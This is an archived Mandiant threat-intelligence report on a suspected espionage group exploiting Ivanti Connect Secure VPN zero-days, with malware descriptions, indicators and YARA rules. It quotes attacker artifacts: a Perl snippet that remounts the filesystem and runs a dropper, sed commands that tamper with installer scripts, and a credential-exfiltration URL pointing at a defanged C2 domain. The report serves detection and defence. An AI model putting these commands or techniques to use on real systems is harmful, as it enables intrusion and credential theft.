{ "id": "bb038057-3181-48d9-88e2-1e4372f55ad0", "created_at": "2026-04-06T00:07:48.937998Z", "updated_at": "2026-04-10T03:28:20.597041Z", "deleted_at": null, "sha1_hash": "63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d", "title": "Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 98494, "plain_text": "Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN\r\nin New Zero-Day Exploitation\r\nBy Mandiant\r\nPublished: 2024-01-11 · Archived: 2026-04-02 11:37:01 UTC\r\nWritten by: Tyler McLellan, John Wolfram, Gabby Roncone, Matt Lin, Robert Wallace, Dimiter Andonov\r\nNote: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more\r\nindicators, detections, and information to this blog post as needed.\r\nOn January 10, 2024, Ivanti disclosed two vulnerabilities, CVE-2023-46805 and CVE-2024-21887, impacting\r\nIvanti Connect Secure VPN (“CS”, formerly Pulse Secure) and Ivanti Policy Secure (“PS”) appliances. Successful\r\nexploitation could result in authentication bypass and command injection, leading to further downstream\r\ncompromise of a victim network. Mandiant has identified zero-day exploitation of these vulnerabilities in the wild\r\nbeginning as early as December 2023 by a suspected espionage threat actor, currently being tracked as UNC5221.\r\nIvanti has been working closely with Mandiant, affected customers, government partners, and Volexity to address\r\nthese issues. As part of their investigation, Ivanti has released a blog post and mitigations for the vulnerabilities\r\nexploited in this campaign to assist with determining if systems have been impacted. Patches are currently being\r\ndeveloped and Ivanti customers are urged to follow the KB article to stay informed on target dates and releases.\r\nMandiant is sharing details of five malware families associated with the exploitation of CS and PS devices. These\r\nfamilies allow the threat actors to circumvent authentication and provide backdoor access to these devices.\r\nAdditional post-exploitation tools have also been identified in our investigation and are highlighted further in this\r\npost.\r\nPost Exploitation Activity\r\nFollowing the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887\r\n(command injection), UNC5221 leveraged multiple custom malware families, in several cases trojanizing\r\nlegitimate files within CS with malicious code. UNC5221 was also observed leveraging the PySoxy tunneler and\r\nBusyBox to enable post-exploitation activity.\r\nDue to certain sections of the device being read-only, UNC5221 leveraged a Perl script ( sessionserver.pl ) to\r\nremount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes\r\nthe web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling.\r\nuse lib ($ENV{'DSINSTALL'} =~ /(\\S*)/)[0] . \"/perl\";\r\nuse DSSafe;\r\nsystem(\"mount -o remount,rw /\");\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 1 of 7\n\nsystem(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");\r\nsystem(\"/home/etc/sql/dsserver/sessionserver.sh 1\u003e/dev/null 2\u003e/tmp/errlog\");\r\nsystem(\"mount -o remount,ro /\");\r\nMandiant has determined that THINSPOOL acts as a key tool for both persistence and detection evasion, in\r\naddition to being the initial dropper for the LIGHTWIRE web shell used by UNC5221 for post-exploitation\r\nactivity. The LIGHTWIRE and WIREFIRE web shells used by UNC5221, post-compromise, are lightweight\r\nfootholds enabling further and continued access to the CS appliances. This indicates that these are not\r\nopportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it\r\ncompromised after a patch was inevitably released. Additionally, the WARPWIRE Javascript credential stealer\r\nmay also enable further access to accounts for lateral movement or espionage by capturing plaintext login\r\ncredentials.\r\nCustom Malware Identified\r\nZIPLINE Passive Backdoor\r\nZIPLINE is a passive backdoor that hijacks an exported function, accept() , from the file libsecure.so. When\r\nZIPLINE invokes the hijacked accept() function, it first resolves the benign accept() from libc , to\r\nintercept network traffic. Once an incoming connection is registered, it is first processed by the benign\r\nlibc_accept , and ZIPLINE then checks if the process name is “web”. The malware retrieves up to 21 bytes\r\nfrom the connected host, verifying if the received buffer corresponds to the string “SSH-2.0-OpenSSH_0.3xx.” If\r\nso, the malicious functionality of ZIPLINE is triggered. ZIPLINE will then receive an encrypted header which\r\nspecifies the command to be executed. Further details about this hijacking technique for the accept() function\r\ncan be found in this SecureIdeas post.\r\nZIPLINE supports the following commands:\r\nCommand\r\nID\r\nOperation Description\r\n1 File Upload\r\nThe command contains the path of the file to be sent to the connected\r\nhost.\r\n2 File Download\r\nThe command contains the file path and its content to be saved on the\r\ncompromised system.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 2 of 7\n\n3 Reverse Shell\r\nA reverse shell is created using /bin/sh and the provided command is\r\nexecuted\r\n4 Proxy Server\r\nCreates a proxy server with an IP address provided as part of the\r\ncommand.\r\n5\r\nTunneling\r\nServer\r\nImplements a tunneling server, capable of simultaneously dispatching\r\ntraffic between multiple endpoints.\r\nUpon initialization, ZIPLINE copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload , which will\r\nbe executed if the process name is “dspkginstall”. ZIPLINE then copies itself to /tmp/data/root/home/lib .\r\nUpon termination ZIPLINE first checks if the process name is tar. If the process name is tar, the malware executes\r\ndifferent functionalities based on the provided parameters: -xzf , --exclude , or ./installer .\r\nIf the parameter --exclude is used, ZIPLINE will add itself to the CS exclusion_list . The exclusion_list\r\nis part of the Ivanti Integrity Checker Tool and Mandiant assesses this is a measure implemented by the attacker to\r\nevade detection.\r\nIf the parameter -xzf is used, ZIPLINE computes its own SHA256 hash, formats the line ./root , and then\r\nappends this string to each file within the ./installer/bom_files directory. This is achieved using the\r\ncommand: echo \u003e\u003e ./installer/bom_files/ .\r\nIf the parameter ./installer is used, ZIPLINE deletes specific lines from /pkg/do-install and\r\n./installer/do-install . To do so, it executes the following sed commands:\r\nsed -i '/retval=$(exec $installer $@)/d' /pkg/do-install\r\nsed -i '/exit $?/d' /pkg/do-install\r\nsed -i '/retval=$(exec $installer $@)/d' ./installer/do-install\r\nsed -i '/exit $?/d' ./installer/do-install\r\nTHINSPOOL Dropper\r\nTHINSPOOL is a dropper written in shell script that writes the web shell LIGHTWIRE to a legitimate CS file.\r\nTHINSPOOL will re-add the malicious web shell code to legitimate files after an update, allowing UNC5221 to\r\npersist on the compromised devices. THINSPOOL attempts to evade Ivanti’s Integrity Checker but Mandiant\r\nobserved this attempt failed.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 3 of 7\n\nLIGHTWIRE and WIREFIRE Web Shells\r\nLIGHTWIRE is a web shell written in Perl CGI that is embedded into a legitimate Secure Connect file to enable\r\narbitrary command execution. LIGHTWIRE intercepts requests to compcheckresult.cgi that contain the\r\nparameters “ comp=comp ” and “ compid ”, where “ compid ” contains Base64-encoded and RC4-encrypted\r\nciphertext. The decoded cleartext is interpreted and executed as Perl code.\r\nWIREFIRE is a web shell written in Python that exists as trojanized logic to a component of the Connect Secure\r\nappliance. WIREFIRE supports downloading files to the compromised device and executing arbitrary commands.\r\nIt contains logic inserted before authentication that responds to specific HTTP POST requests to\r\n/api/v1/cav/client/visits . If formdata entry “ file ” exists, the web shell saves the content to the device\r\nwith a specified filename; if not, the web shell attempts to decode, decrypt, and zlib decompress any raw data\r\nexisting after a GIF header to execute as a subprocess. The output of the executed process will be zlib compressed,\r\nAES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “ message ” field\r\nvia an HTTP 200 OK.\r\nWARPWIRE Credential Harvester\r\nWARPWIRE is a credential harvester written in Javascript that is embedded into a legitimate Connect Secure file.\r\nWARPWIRE targets plaintext passwords and usernames which are submitted via a HTTP GET request to a\r\ncommand and control (C2) server.\r\nWARPWIRE captures credentials submitted during the web logon to access layer 7 applications, like RDP.\r\nCaptured credentials are Base64-encoded with btoa() before they are submitted to the C2 via a HTTP GET\r\nrequest.\r\nhxxps://symantke[.]com/?\u003cusername\u003e\u0026\u003cpassword\u003e\r\nAttribution\r\nAt the time of publication, Mandiant had not linked this activity to a previously known group, nor do we currently\r\nhave enough data to assess the origin of this threat actor. UNC5221 was created to track this suspected espionage\r\nactor. The targeting of edge infrastructure with zero-day vulnerabilities has been a consistent tactic leveraged by\r\nespionage actors to enable their operations. Additionally, Mandiant has previously observed multiple suspected\r\nAPT actors utilizing appliance specific malware to enable post-exploitation and evade detection. These instances,\r\ncombined with Volexity’s findings around targeting, leads Mandiant to suspect this is an espionage-motivated APT\r\ncampaign.\r\nUNC5221 primarily used compromised out-of-support Cyberoam VPN appliances for C2. These compromised\r\ndevices were domestic to the victims, which likely helped the threat actor to better evade detection.\r\nConclusion \u0026 Recommendations\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 4 of 7\n\nUNC5221’s activity demonstrates that exploiting and living on the edge of networks remains a viable and\r\nattractive target for espionage actors. As we have previously reported, the combination of zero-day exploitation,\r\nedge device compromise, use of compromised C2 infrastructure, and detection evasion methods such as writing\r\ncode to legitimate files have become a hallmark of espionage actors’ toolboxes.\r\nWe recommend following the guidance outlined in the Ivanti blog post on this activity. Ivanti customers are urged\r\nto implement mitigation as soon as possible and to follow the post for upcoming patch release schedules. Details\r\nabout Ivanti’s Integrity Checker Tool (ICT) are also available.\r\nAcknowledgement\r\nWe would like to thank the team at Ivanti for their partnership and support in this investigation. Additionally, this\r\nanalysis would not have been possible without the assistance from people across Mandiant Intelligence,\r\nConsulting, and FLARE as well as our colleagues on Google TAG. We would like to specifically acknowledge\r\nAseel Kayal and Nick Simonian from Mandiant’s Adversary Methods Research and Discovery (RAD) team for\r\ntheir support of this investigation.\r\nIndicators of Compromise (IOCs)\r\nCode Family Filename Description\r\nLIGHTWIRE compcheckresult.cgi Web shell\r\nTHINSPOOL sessionserver.sh Web shell dropper\r\nWARPWIRE lastauthserverused.js Credential harvester\r\nWIREFIRE visits.py Web shell\r\nTHINSPOOL Utility sessionserver.pl Script\r\nZIPLINE libsecure.so.1 Passive backdoor\r\nNetwork-Based Indicators (NBIs)\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 5 of 7\n\nsymantke[.]com WARPWIRE C2\r\nYARA Rule\r\nrule M_Hunting_Dropper_WIREFIRE_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to\r\n md5 = \"6de651357a15efd01db4e658249d4981\"\r\n strings:\r\n $s1 = \"zlib.decompress(aes.decrypt(base64.b64decode(\" ascii\r\n $s2 = \"aes.encrypt(t+('\\\\x00'*(16-len(t)%16))\" ascii\r\n $s3 = \"Handles DELETE request to delete an existing visits data.\" ascii\r\n $s4 = \"request.data.decode().startswith('GIF'):\" ascii\r\n $s5 = \"Utils.api_log_admin\" ascii\r\n condition:\r\n filesize \u003c 10KB\r\n and all of them\r\n}\r\nrule M_Hunting_Webshell_LIGHTWIRE_2 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects LIGHTWIRE based on the RC4\r\ndecoding and execution 1-liner.\"\r\n md5 = \"3d97f55a03ceb4f71671aa2ecf5b24e9\"\r\n strings:\r\n $re1 = /eval\\{my.{1,20}Crypt::RC4-\u003enew\\(\\\".{1,50}-\u003eRC4\\\r\n(decode_base64\\(CGI::param\\(\\'.{1,30};eval\\s\\$.{1,30}\\\"Compatibility\r\n\\scheck:\\s\\$@\\\";\\}/\r\n condition:\r\n filesize \u003c 10KB\r\n and all of them\r\n}\r\nrule M_Hunting_Dropper_THINSPOOL_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects THINSPOOL, a dropper that\r\ninstalls the LIGHTWIRE web shell onto a Pulse Secure system.\"\r\n md5 = \"677c1aa6e2503b56fe13e1568a814754\"\r\n strings:\r\n $s1 = \"/tmp/qactg/\" ascii\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 6 of 7\n\n$s2 = \"echo '/home/config/dscommands'\" ascii\r\n $s3 = \"echo '/home/perl/DSLogConfig.pm'\" ascii\r\n $s4 = \"ADM20447\" ascii\r\n condition:\r\n filesize \u003c 10KB\r\n and all of them\r\n}\r\nrule M_Hunting_CredTheft_WARPWIRE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects WARPWIRE, a credential stealer\r\nwritten in Javascript that is embedded into a legitimate Pulse Secure file.\"\r\n md5 = \"d0c7a334a4d9dcd3c6335ae13bee59ea\"\r\n strings:\r\n $s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e\r\n74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}\r\n $s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e\r\n74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}\r\n $s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}\r\n $s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48\r\n74 74 70 52 65 71 75 65 73 74}\r\n $s5 = \"Remember the last selected auth realm for 30 days\" ascii\r\n condition:\r\n filesize \u003c 8KB and\r\nall of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA", "MITRE" ], "references": [ "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day" ], "report_names": [ "suspected-apt-targets-ivanti-zero-day" ], "threat_actors": [ { "id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8", "created_at": "2024-01-18T02:02:34.643994Z", "updated_at": "2026-04-10T02:00:04.959645Z", "deleted_at": null, "main_name": "UNC5221", "aliases": [ "UNC5221", "UTA0178" ], "source_name": "ETDA:UNC5221", "tools": [ "BRICKSTORM", "GIFTEDVISITOR", "GLASSTOKEN", "LIGHTWIRE", "PySoxy", "THINSPOOL", "WARPWIRE", "WIREFIRE", "ZIPLINE" ], "source_id": "ETDA", "reports": null }, { "id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9", "created_at": "2024-01-12T02:00:04.33082Z", "updated_at": "2026-04-10T02:00:03.517264Z", "deleted_at": null, "main_name": "UTA0178", "aliases": [ "UNC5221", "Red Dev 61" ], "source_name": "MISPGALAXY:UTA0178", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7", "created_at": "2022-10-25T16:07:23.704358Z", "updated_at": "2026-04-10T02:00:04.718034Z", "deleted_at": null, "main_name": "Harvester", "aliases": [], "source_name": "ETDA:Harvester", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Graphon", "Metasploit", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434068, "ts_updated_at": 1775791700, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d.pdf", "text": "https://archive.orkl.eu/63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d.txt", "img": "https://archive.orkl.eu/63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d.jpg" } }